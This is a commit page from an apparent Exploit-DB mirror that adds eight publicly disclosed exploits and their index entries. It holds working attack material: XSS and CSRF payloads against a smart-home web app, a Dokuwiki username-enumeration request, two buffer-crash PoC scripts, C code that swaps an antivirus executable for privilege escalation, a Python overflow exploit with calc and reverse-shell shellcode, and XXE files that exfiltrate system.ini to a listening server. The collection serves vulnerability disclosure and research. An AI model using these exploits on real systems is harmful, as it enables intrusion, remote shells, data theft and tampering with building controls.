bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-12-03

Browse source 
8 changes to exploits/shellcodes

Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
Visual Studio 2008 - XML External Entity Injection
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
Anviz CrossChex 4.3.12 - Local Buffer Overflow
Microsoft Excel 2016 1901 - XML External Entity Injection
SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
Dokuwiki 2018-04-22b - Username Enumeration
This commit is contained in:
Offensive Security 2019-12-03 05:01:42 +00:00
parent 8ae8522082
commit 0f56f2f38c
9 changed files with 718 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

123
exploits/php/webapps/47730.txt Normal file
View file

@ -0,0 +1,123 @@
# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
# Discovery by: LiquidWorm
# Date: 2019-12-02
# Vendor Homepage: http://www.gavazzi-automation.com
# Tested Version: 6.5.33.17072501
# CVE: N/A
# Advisory ID: ZSL-2019-5543
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
Vendor: Carlo Gavazzi Automation S.p.A
Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
Affected version: Web-app: 6.5.33.17072501
Web-app: 6.5.32.17062101
Web-app: 6.2.3.16102701
Web-app: 5.5.3.160421101
Web-app: 5.3.3.15120101
Release: 1.0.5.1
Release: 1.0.5.0
Release: 1.0.3.5
Release: 1.0.3.2
Summary: Carlo Gavazzi is an international company that develops, manufactures
and sells electrical automation components. Our products are used in industrial
automation and real estate automation. Smart-house is based on a system that we
have developed and produced since 1986, mainly for industrial-related installations.
Our system is present in more than 150,000 installations. For a few years now, we
have focused our development on smart electrical installations for home and property
automation. Smart-house is currently installed in both villas and commercial properties.
Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site. Input passed
to several GET/POST parameters is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5543
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
01.11.2019
--
Reflected XSS (GET):
--------------------
1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)
CSRF set temperature:
---------------------
<html>
<body>
<form action="http://192.168.0.24/app/datasend.php" method="POST">
<input type="hidden" name="IDFunction" value="3875" />
<input type="hidden" name="favorite" value="0" />
<input type="hidden" name="rooms" value="-1" />
<input type="hidden" name="userId" value="-300" />
<input type="hidden" name="heat_ensave_set" value="24" />
<input type="hidden" name="heat_set" value="25.5" />
<input type="submit" value="Set" />
</form>
</body>
</html>
Stored XSS (POST):
------------------
<html>
<body>
<form action="http://192.168.0.24/app/command.php" method="POST">
<input type="hidden" name="op" value="11" />
<input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
<input type="hidden" name="period" value="2" />
<input type="hidden" name="gg" value="6" />
<input type="hidden" name="ggf" value="6" />
<input type="hidden" name="mm" value="11" />
<input type="hidden" name="mmf" value="11" />
<input type="hidden" name="aa" value="2019" />
<input type="hidden" name="aaf" value="2019" />
<input type="hidden" name="param" value="[1]" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Reflected XSS (POST):
---------------------
<html>
<body>
<form action="http://192.168.0.24/refresh.php">
<input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
<input type="hidden" name="param[0][]" value="0251" />
<input type="hidden" name="param[0][]" value="switch" />
<input type="hidden" name="param[1][]" value="switch1250" />
<input type="hidden" name="param[1][]" value="1250" />
<input type="hidden" name="param[1][]" value="switch" />
<input type="submit" value="Send" />
</form>
</body>
</html>

37
exploits/php/webapps/47731.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :
# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=sss
# Response for non-valid user(sss):
<div class="error">Sorry, we can't find this user in our database.</div>
========================================================================
# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=admin
# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>

35
exploits/windows/dos/47728.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
# software significantly reduces the total cost of network management in enterprise environments by enabling
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
# installing server-side applications on these computers and create a report of potential problems that were found.
# PoC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 1000
try:
f=open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

37
exploits/windows/dos/47732.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
# network for all potential methods that a hacker might use to attack it and create a report of potential
# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
# network management in enterprise environments by enabling IT personnel and systems administrators gather
# a wide range of information from all the computers in the network without installing server-side applications
# on these computers and create a report of potential problems that were found.
# POC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 1000
try:
f=open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

133
exploits/windows/local/47733.txt Normal file
View file

@ -0,0 +1,133 @@
# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]
www.maxpcsecure.com
[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
N/A
[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
[Affected Component]
Permissions on installation directory
[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(1000);
CopyFile(fname, TARGET, FALSE);
printf("[+] Replaced legit Max Secure EXE...\n");
Sleep(2000);
printf("[+] Done!\n");
MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
Sleep(1000);
exit(0);
}
}else{
if(FileExists(TMP)){
remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
}
}
[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

125
exploits/windows/local/47734.py Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
import socket
import time
import sys
import binascii
# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all
# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
# shellcode windows x86 reverse_shell
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
def ipToShellcode(ip):
a = ip.split('.')
b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
b = b.replace("0x","")
return binascii.unhexlify(b)
# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
request = b"A"*77 # Original payload substitute
request += b"B"*184
request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
request += b"A"*4
# 269 bytes
if len(sys.argv) > 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print('[!] Failed to create server socket')
try:
s.bind(('', port))
except:
print('[*] Server socket bind failed')
sys.exit()
print('[*] Waiting for crosschex')
s.settimeout(timeout)
timeout = time.time() + timeout
responses = []
while True:
if time.time() > timeout:
break
try:
response = s.recvfrom(1024)
print(response)
responses.append(response)
sendFuzzingUDPBroadcast(ip=ip)
response = s.recvfrom(1024)
except socket.timeout:
print("[!] Error with UDP server")
s.close()
return responses
nargs = len(sys.argv)
if nargs < 2:
print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
sys.exit(0)
setFuzzUDPServer()

113
exploits/xml/local/47729.txt Normal file
View file

@ -0,0 +1,113 @@
# Exploit Title: Visual Studio 2008 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Software Link: Visual Studio 2008 Express IDE
# Tested Version: 2008
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279
[Vulnerability Type]
XML External Entity Injection 0Day
[CVE Reference]
N/A
[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
remote attackers server.
Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml
This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.
<?xml version="1.0"?>
<!DOCTYPE knobgobslob [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
python -m SimpleHTTPServer
python -m http.server (Python3)
[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me link to "Definition of a Security Vulnerability"
Also Product is also not supported anymore.
December 1, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

107
exploits/xml/local/47735.txt Normal file
View file

@ -0,0 +1,107 @@
# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Tested Version: 2016 v1901
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Excel 2016 v1901
Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.
[CVE]
N/A
[Vulnerability Type]
Error Import Based XML External Entity Injection
[Security Issue]
Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
Html page" functionality upon receiving errors importing a specially crafted XML file.
This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.
Tested successfuly Windows 10 .NET framework version v4.0.30319.
C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319
[Exploit/POC]
Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'
1) You will get error like:
"Error:
Unable to connect
We encountered an error while trying to connect.
The user will then get an option to 'Edit' where they can import the file as an HTML file
Result Local data can be exfiltrated to remote server"
2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel
User has choose to import as HTML then XXE attack will succeed:
e.g.
127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
/1.1" 200 -
Malicious XML file to load as New Data Query
"test.xml"
<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
<pwn>&send;</pwn>
[Network Access]
Local
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

8
files_exploits.csv
View file

@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port
47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port
47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,

Can't render this file because it is too large.